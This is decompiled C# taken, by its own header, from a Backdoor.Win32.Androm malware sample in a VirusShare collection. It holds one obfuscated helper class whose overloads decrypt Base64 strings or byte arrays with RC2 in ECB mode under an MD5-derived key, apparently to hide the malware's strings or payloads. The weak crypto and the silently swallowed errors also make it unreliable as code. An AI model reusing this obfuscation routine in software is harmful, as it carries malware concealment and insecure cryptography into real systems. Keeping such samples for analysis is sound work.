// Decompiled with JetBrains decompiler // Type:  // Assembly: mlw, Version=5.4.2.6, Culture=neutral, PublicKeyToken=null // MVID: 968ED84C-4CC9-4699-A4B5-2702B06E186C // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Backdoor.Win32.Androm.hdnr-92392a61ec8326d02c20375aa31b3fc87adc2e038afd55b96dedff4b65022267.exe using Microsoft.VisualBasic.CompilerServices; using System; using System.Security.Cryptography; using System.Text; [StandardModule] internal sealed class \u0006 { public static string \u0002(string _param0, string _param1) { RC2CryptoServiceProvider cryptoServiceProvider1 = new RC2CryptoServiceProvider(); MD5CryptoServiceProvider cryptoServiceProvider2 = new MD5CryptoServiceProvider(); string str; try { byte[] hash = cryptoServiceProvider2.ComputeHash(Encoding.ASCII.GetBytes(_param1)); cryptoServiceProvider1.Key = hash; cryptoServiceProvider1.Mode = CipherMode.ECB; ICryptoTransform decryptor = cryptoServiceProvider1.CreateDecryptor(); byte[] inputBuffer = Convert.FromBase64String(_param0); str = Encoding.ASCII.GetString(decryptor.TransformFinalBlock(inputBuffer, 0, inputBuffer.Length)); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } return str; } public static byte[] \u0002(byte[] _param0, string _param1) { RC2CryptoServiceProvider cryptoServiceProvider1 = new RC2CryptoServiceProvider(); MD5CryptoServiceProvider cryptoServiceProvider2 = new MD5CryptoServiceProvider(); byte[] numArray; try { byte[] hash = cryptoServiceProvider2.ComputeHash(Encoding.ASCII.GetBytes(_param1)); cryptoServiceProvider1.Key = hash; cryptoServiceProvider1.Mode = CipherMode.ECB; ICryptoTransform decryptor = cryptoServiceProvider1.CreateDecryptor(); byte[] inputBuffer = _param0; numArray = decryptor.TransformFinalBlock(inputBuffer, 0, inputBuffer.Length); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } return numArray; } }